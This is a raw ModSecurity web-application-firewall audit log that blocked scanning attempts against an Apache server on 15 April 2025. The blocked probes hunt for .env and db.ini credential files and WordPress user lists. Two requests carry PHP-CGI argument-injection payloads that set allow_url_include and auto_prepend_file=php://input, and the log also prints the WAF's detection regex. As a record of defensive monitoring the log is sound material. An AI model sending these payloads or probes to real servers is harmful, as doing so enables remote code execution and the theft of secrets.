"apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744681896420024 844 (- - -) Stopwatch2: 1744681896420024 844; combined=337, p1=299, p2=0, p3=0, p4=0, p5=38, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0327055-Z-- --b2cb8d29-A-- [15/Apr/2025:08:51:36 +0700] Z_27qCULYKh39tLgM0CFzgAAAEI 103.236.140.4 41560 103.236.140.4 8181 --b2cb8d29-B-- GET /config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --b2cb8d29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2cb8d29-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744681896601907 738 (- - -) Stopwatch2: 1744681896601907 738; combined=290, p1=254, p2=0, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2cb8d29-Z-- --c3eb047f-A-- [15/Apr/2025:08:51:36 +0700] Z_27qKXLWI2MDahumW9vjwAAAMI 103.236.140.4 41562 103.236.140.4 8181 --c3eb047f-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --c3eb047f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3eb047f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744681896769833 672 (- - -) Stopwatch2: 1744681896769833 672; combined=263, p1=230, p2=0, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3eb047f-Z-- --89f54c63-A-- [15/Apr/2025:08:51:36 +0700] Z_27qM1f8LoF-Pq3UL777gAAAIo 103.236.140.4 41564 103.236.140.4 8181 --89f54c63-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --89f54c63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89f54c63-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744681896771645 654 (- - -) Stopwatch2: 1744681896771645 654; combined=253, p1=220, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89f54c63-Z-- --915c793a-A-- [15/Apr/2025:08:51:36 +0700] Z_27qKXLWI2MDahumW9vkAAAAMA 103.236.140.4 41566 103.236.140.4 8181 --915c793a-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --915c793a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --915c793a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744681896937504 621 (- - -) Stopwatch2: 1744681896937504 621; combined=253, p1=222, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --915c793a-Z-- --9e30d912-A-- [15/Apr/2025:08:51:36 +0700] Z_27qKXLWI2MDahumW9vkQAAAME 103.236.140.4 41568 103.236.140.4 8181 --9e30d912-B-- GET /config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9e30d912-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e30d912-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744681896940680 605 (- - -) Stopwatch2: 1744681896940680 605; combined=244, p1=213, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e30d912-Z-- --573ad162-A-- [15/Apr/2025:08:51:37 +0700] Z_27qSULYKh39tLgM0CFzwAAAEQ 103.236.140.4 41570 103.236.140.4 8181 --573ad162-B-- GET /settings/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --573ad162-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --573ad162-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744681897105181 639 (- - -) Stopwatch2: 1744681897105181 639; combined=261, p1=230, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --573ad162-Z-- --8ed68556-A-- [15/Apr/2025:08:51:37 +0700] Z_27qSULYKh39tLgM0CF0AAAAEU 103.236.140.4 41572 103.236.140.4 8181 --8ed68556-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --8ed68556-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ed68556-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744681897121626 617 (- - -) Stopwatch2: 1744681897121626 617; combined=248, p1=216, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ed68556-Z-- --9e509229-A-- [15/Apr/2025:08:51:37 +0700] Z_27qSULYKh39tLgM0CF0gAAAEo 103.236.140.4 41576 103.236.140.4 8181 --9e509229-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9e509229-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e509229-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744681897290569 642 (- - -) Stopwatch2: 1744681897290569 642; combined=259, p1=226, p2=0, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e509229-Z-- --ecd74957-A-- [15/Apr/2025:08:51:37 +0700] Z_27qaXLWI2MDahumW9vkwAAAMU 103.236.140.4 41580 103.236.140.4 8181 --ecd74957-B-- GET /settings/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --ecd74957-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecd74957-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744681897459824 761 (- - -) Stopwatch2: 1744681897459824 761; combined=326, p1=292, p2=0, p3=0, p4=0, p5=34, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecd74957-Z-- --6242ae32-A-- [15/Apr/2025:08:51:38 +0700] Z_27qqXLWI2MDahumW9vmwAAANM 103.236.140.4 41596 103.236.140.4 8181 --6242ae32-B-- GET /db.ini HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --6242ae32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6242ae32-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744681898548441 1679 (- - -) Stopwatch2: 1744681898548441 1679; combined=619, p1=301, p2=292, p3=0, p4=0, p5=26, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6242ae32-Z-- --2a86644c-A-- [15/Apr/2025:15:28:42 +0700] Z_4YuqXLWI2MDahumW964gAAAM8 103.236.140.4 35904 103.236.140.4 8181 --2a86644c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 174.138.30.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 174.138.30.61 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: */* --2a86644c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a86644c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744705722542946 3130 (- - -) Stopwatch2: 1744705722542946 3130; combined=1398, p1=444, p2=926, p3=0, p4=0, p5=28, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a86644c-Z-- --4a9d172a-A-- [15/Apr/2025:16:33:52 +0700] Z_4oAM1f8LoF-Pq3UL4Q1AAAAIo 103.236.140.4 36318 103.236.140.4 8181 --4a9d172a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.16 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.16 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --4a9d172a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a9d172a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744709632189923 909 (- - -) Stopwatch2: 1744709632189923 909; combined=391, p1=343, p2=0, p3=0, p4=0, p5=48, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a9d172a-Z-- --5768df07-A-- [15/Apr/2025:16:33:54 +0700] Z_4oAs1f8LoF-Pq3UL4Q1gAAAIs 103.236.140.4 36322 103.236.140.4 8181 --5768df07-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.16 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.16 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --5768df07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5768df07-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744709634275383 671 (- - -) Stopwatch2: 1744709634275383 671; combined=270, p1=236, p2=0, p3=0, p4=0, p5=34, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5768df07-Z-- --c37e406e-A-- [15/Apr/2025:16:46:04 +0700] Z_4q3M1f8LoF-Pq3UL4Q3gAAAIU 103.236.140.4 36394 103.236.140.4 8181 --c37e406e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.198.4.146 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.198.4.146 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --c37e406e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c37e406e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744710364602221 868 (- - -) Stopwatch2: 1744710364602221 868; combined=354, p1=314, p2=0, p3=0, p4=0, p5=40, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c37e406e-Z-- --3a15707f-A-- [15/Apr/2025:17:33:27 +0700] Z_4198-f7AifS1fst96B1wAAAAM 103.236.140.4 40492 103.236.140.4 8181 --3a15707f-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 130.61.224.219 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 130.61.224.219 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --3a15707f-C-- --3a15707f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a15707f-E-- --3a15707f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744713207052228 4763 (- - -) Stopwatch2: 1744713207052228 4763; combined=3146, p1=470, p2=2645, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a15707f-Z-- --3ada0e01-A-- [15/Apr/2025:18:31:40 +0700] Z_5DnCULYKh39tLgM0CSfQAAAFI 103.236.140.4 40850 103.236.140.4 8181 --3ada0e01-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --3ada0e01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ada0e01-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744716700658483 791 (- - -) Stopwatch2: 1744716700658483 791; combined=329, p1=287, p2=0, p3=0, p4=0, p5=42, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ada0e01-Z-- --97d65c4a-A-- [15/Apr/2025:18:32:10 +0700] Z_5Dus1f8LoF-Pq3UL4TqwAAAIQ 103.236.140.4 40852 103.236.140.4 8181 --97d65c4a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36 Accept-Charset: utf-8 --97d65c4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97d65c4a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744716730525632 723 (- - -) Stopwatch2: 1744716730525632 723; combined=306, p1=267, p2=0, p3=0, p4=0, p5=39, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97d65c4a-Z-- --6a09470f-A-- [15/Apr/2025:20:02:03 +0700] Z_5Yy6XLWI2MDahumW9-qQAAANI 103.236.140.4 42102 103.236.140.4 8181 --6a09470f-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --6a09470f-C-- --6a09470f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a09470f-E-- --6a09470f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744722123171335 5051 (- - -) Stopwatch2: 1744722123171335 5051; combined=3128, p1=508, p2=2587, p3=0, p4=0, p5=32, sr=75, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a09470f-Z-- --b1fbe65f-A-- [15/Apr/2025:20:22:04 +0700] Z_5dfKXLWI2MDahumW9-wwAAAMo 103.236.140.4 42282 103.236.140.4 8181 --b1fbe65f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.14) Gecko/20110218 AlexaToolbar/alxf-2.0 Firefox/3.6.14 Accept-Charset: utf-8 --b1fbe65f-F-- 